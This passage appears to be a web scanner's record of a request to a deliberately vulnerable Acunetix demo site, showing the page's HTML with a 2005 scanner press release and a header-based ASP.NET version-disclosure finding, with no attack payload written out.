2hlY2tzIGNhbiBlYXNpbHkgYmUgcmUtbGF1bmNoZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGVhY2ggYXBwbGljYXRpb24gdXBkYXRlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkhvdyBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIHdvcmtzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGZpcnN0IGNyYXdscyB0aGUgd2hvbGUgd2Vic2l0ZSwgYW5hbHl6ZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW4tZGVwdGggZWFjaCBmaWxlIGl0IGZpbmRzLCBhbmQgZGlzcGxheXMgdGhlIGVudGlyZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB3ZWJzaXRlIHN0cnVjdHVyZS4gQWZ0ZXIgdGhpcyBkaXNjb3Zlcnkgc3RhZ2UsIGl0IHBlcmZvcm1zICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFuIGF1dG9tYXRpYyBhdWRpdCBmb3IgY29tbW9uIHNlY3VyaXR5IHZ1bG5lcmFiaWxpdGllcy48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BdXRvbWF0aWNhbGx5IGRldGVjdHMgU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiB2dWxuZXJhYmlsaXRpZXM8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBTUUwgaW5qZWN0aW9uIGlzIGEgaGFja2luZyB0ZWNobmlxdWUgd2hpY2ggbW9kaWZpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgU1FMIGNvbW1hbmRzIGluIG9yZGVyIHRvIGdhaW4gYWNjZXNzIHRvIGRhdGEgaW4gdGhlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGFiYXNlLiBDcm9zcyBzaXRlIHNjcmlwdGluZyBhdHRhY2tzIGFsbG93IGEgaGFja2VyICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRvIGV4ZWN1dGUgYSBtYWxpY2lvdXMgc2NyaXB0IG9uIHlvdXIgdmlzaXRvcnMnIGJyb3dzZXIuICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgY2FuIGNoZWNrIGlmIHlvdXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGlzIHZ1bG5lcmFibGUgdG8gYm90aCBvZiB0aGVzZSBhdHRhY2tzLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBNb3JlIGluZm9ybWF0aW9uIGFib3V0IGNyb3NzIHNpdGUgc2NyaXB0aW5nICZhbXA7IFNRTCAgICAgICAgICAgICAgICAgICAgICAgICAgICBpbmplY3Rpb24gYXQgb3VyIHdlYnNpdGUgc2VjdXJpdHkgaW5mbyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgYWxzbyBjaGVja3MgZm9yICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRoZSBmb2xsb3dpbmcgd2ViIGF0dGFja3M6PC9zdHJvbmc+PC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDx1bD4gPGxpPkNSTEYgaW5qZWN0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5Db2RlIGV4ZWN1dGlvbiBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RGlyZWN0b3J5IHRyYXZlcnNhbCBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RmlsZSBpbmNsdXNpb24gYXR0YWNrczxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvbGk+PGxpPiBJbnB1dCB2YWxpZGF0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5BdXRoZW50aWNhdGlvbiBhdHRhY2tzLjwvbGk+IDwvdWw+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BZHZhbmNlZCBwZW5ldHJhdGlvbiB0ZXN0aW5nIHRvb2xzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGFsc28gaW5jbHVkZXMgdG9vbHMgc3VjaCBhcyBhbiBIVFRQIGVkaXRvciAgICAgICAgICAgICAgICAgICAgICAgICAgICAmYW1wOyBIVFRQIHNuaWZmZXIgdG8gYWxsb3cgY3VzdG9taXphdGlvbiBvZiB3ZWIgdnVsbmVyYWJpbGl0eSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjaGVja3MuIFVzaW5nIHRoZSBWdWxuZXJhYmlsaXR5IGVkaXRvciwgbmV3IGF0dGFja3MgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FuIGVhc2lseSBiZSBjcmVhdGVkLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlByaWNpbmcgJmFtcDsgYXZhaWxhYmlsaXR5PC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGlzIGF2YWlsYWJsZSBhcyBhbiBlbnRlcnByaXNlIG9yIGFzIGEgY29uc3VsdGFudCAgICAgICAgICAgICAgICAgICAgICAgICAgICB2ZXJzaW9uLiBBIHN1YnNjcmlwdGlvbiBiYXNlZCBsaWNlbnNlIGNhbiBiZSBwdXJjaGFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGFzIGxpdHRsZSBhcyAkMzk1LCB3aGVyZWFzIGEgcGVycGV0dWFsIGxpY2Vuc2Ugc3RhcnRzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGF0ICQyOTk1LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiB2aXNpdCBvdXIgcHJpY2luZyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD5kAgkPDxYCHgtOYXZpZ2F0ZVVybAUSQ29tbWVudHMuYXNweD9pZD0yZGQCCw8WAh4Dc3JjZGRk4+8K4F/0js11lBw12IN/OFdqHcc=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKpz/fHDgL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBHLN3myVVFzWOQRRF0fUO8vWuGWI" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:35:22 AM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</DIV> <DIV id="divNewsLong" class="NewsLong"><p><strong>Acunetix combats rise in web attacks with Acunetix Web Vulnerability Scanner 2 </strong></p> <p>21 July 2005 - <strong>Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</strong> </p> <p><strong>Securing your website should be your number one concern</strong><br /> Hackers are concentrating their efforts on web-based applications - 75% of cyber attacks are done at the web application level, a Gartner Group study has revealed. Web applications are accessible 24 hours a day, 7 days a week and control valuable data such as customer information, transaction information and even proprietary corporate data.</p> <p><strong>500,000 customer credit card numbers obtained via a web attack</strong><br /> Well-known sites that were open to web application attacks include fashion label Guess and pet supply retailer PetCo.com who were notoriously found to be vulnerable to the SQL injection vulnerability (June 2003). This resulted in PetCo leaving as many as 500,000 credit card numbers open to anyone able to construct this specially-crafted URL.</p> <p><strong>Firewalls, SSL and locked-down servers are futile against web application hacking</strong><br /> Any defense at network security level will provide no protection against web application attacks since they are launched on port 80 - which has to remain open. In addition, web applications (customer areas, shopping carts etc.) are often tailor-made, invariably tested less than off-the-shelf software and are therefore more susceptible to attack.</p> <p>"Companies have implemented network-level security, however they fail to audit and secure their web applications. These applications have access to sensitive data and are a hacker's prime target," said Nick Galea, CEO of Acunetix. "Auditing one's web apps should be the number one security concern."</p> <p><strong>The need for an automated web application vulnerability scanner</strong><br /> Manually auditing a web application for vulnerabilities to SQL injection, cross site scripting and other web attacks is virtually impossible. With Acunetix Web Vulnerability Scanner the process of auditing web applications such as shopping carts and forms, can be easily automated. What's more, the security checks can easily be re-launched for each application update.</p> <p><strong>How Acunetix Web Vulnerability Scanner works</strong><br /> Acunetix WVS first crawls the whole website, analyzes in-depth each file it finds, and displays the entire website structure. After this discovery stage, it performs an automatic audit for common security vulnerabilities.</p> <p><strong>Automatically detects SQL injection, cross site scripting and other web vulnerabilities</strong><br /> SQL injection is a hacking technique which modifies SQL commands in order to gain access to data in the database. Cross site scripting attacks allow a hacker to execute a malicious script on your visitors' browser. Acunetix Web Vulnerability Scanner can check if your web application is vulnerable to both of these attacks. More information about cross site scripting & SQL injection at our website security info page.</p> <p><strong>Acunetix Web Vulnerability Scanner also checks for the following web attacks:</strong></p> <ul> <li>CRLF injection attacks<br /> </li><li>Code execution attacks<br /> </li><li>Directory traversal attacks<br /> </li><li>File inclusion attacks<br /> </li><li> Input validation attacks<br /> </li><li>Authentication attacks.</li> </ul> <p><strong>Advanced penetration testing tools</strong><br /> Acunetix WVS also includes tools such as an HTTP editor & HTTP sniffer to allow customization of web vulnerability checks. Using the Vulnerability editor, new attacks can easily be created.</p> <p><strong>Pricing & availability</strong><br /> Acunetix WVS is available as an enterprise or as a consultant version. A subscription based license can be purchased for as little as $395, whereas a perpetual license starts at $2995. For more information visit our pricing page.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=2">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ReadNews.aspx?id=2&NewsAd=ads/def.html
Method	GET
Parameter
Attack
Evidence	2.0.50727
Show / hide Request and Response
Request Header - size: 484 bytes.	GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=2&NewsAd=ads/def.html HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: keep-alive Referer: http://testaspnet.vulnweb.com/ Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:42:46 GMT Content-Length: 30606
Response Body - size: 30,606 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?id=2&NewsAd=ads%2fdef.html" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WAh8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT9kAgcPFgIfAQWbODxwPjxzdHJvbmc+QWN1bmV0aXggY29tYmF0cyByaXNlIGluIHdlYiBhdHRhY2tzIHdpdGggQWN1bmV0aXggICAgICAgICAgICAgICAgICAgICAgICAgICAgV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAyIDwvc3Ryb25nPjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD4yMSBKdWx5IDIwMDUgLSA8c3Ryb25nPlN0YXJ0LXVwIGNvbXBhbnkgQWN1bmV0aXggcmVsZWFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjogYSB0b29sIHRvIGF1dG9tYXRpY2FsbHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXVkaXQgd2Vic2l0ZSBzZWN1cml0eS4gQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAgICAgICAgICAgICAgICAgICAgICAgICAgICAyIGNyYXdscyBhbiBlbnRpcmUgd2Vic2l0ZSwgbGF1bmNoZXMgcG9wdWxhciB3ZWIgYXR0YWNrcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAoU1FMIEluamVjdGlvbiBldGMuKSBhbmQgaWRlbnRpZmllcyB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBuZWVkIHRvIGJlIGZpeGVkLjwvc3Ryb25nPiA8L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5TZWN1cmluZyB5b3VyIHdlYnNpdGUgc2hvdWxkIGJlIHlvdXIgbnVtYmVyIG9uZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjb25jZXJuPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFja2VycyBhcmUgY29uY2VudHJhdGluZyB0aGVpciBlZmZvcnRzIG9uIHdlYi1iYXNlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcHBsaWNhdGlvbnMgLSA3NSUgb2YgY3liZXIgYXR0YWNrcyBhcmUgZG9uZSBhdCB0aGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGxldmVsLCBhIEdhcnRuZXIgR3JvdXAgc3R1ZHkgaGFzIHJldmVhbGVkLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBXZWIgYXBwbGljYXRpb25zIGFyZSBhY2Nlc3NpYmxlIDI0IGhvdXJzIGEgZGF5LCA3IGRheXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgYSB3ZWVrIGFuZCBjb250cm9sIHZhbHVhYmxlIGRhdGEgc3VjaCBhcyBjdXN0b21lciBpbmZvcm1hdGlvbiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHJhbnNhY3Rpb24gaW5mb3JtYXRpb24gYW5kIGV2ZW4gcHJvcHJpZXRhcnkgY29ycG9yYXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGEuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+NTAwLDAwMCBjdXN0b21lciBjcmVkaXQgY2FyZCBudW1iZXJzIG9idGFpbmVkIHZpYSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhIHdlYiBhdHRhY2s8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBXZWxsLWtub3duIHNpdGVzIHRoYXQgd2VyZSBvcGVuIHRvIHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgZmFzaGlvbiBsYWJlbCBHdWVzcyBhbmQgcGV0IHN1cHBseSByZXRhaWxlciAgICAgICAgICAgICAgICAgICAgICAgICAgICBQZXRDby5jb20gd2hvIHdlcmUgbm90b3Jpb3VzbHkgZm91bmQgdG8gYmUgdnVsbmVyYWJsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB0byB0aGUgU1FMIGluamVjdGlvbiB2dWxuZXJhYmlsaXR5IChKdW5lIDIwMDMpLiBUaGlzICAgICAg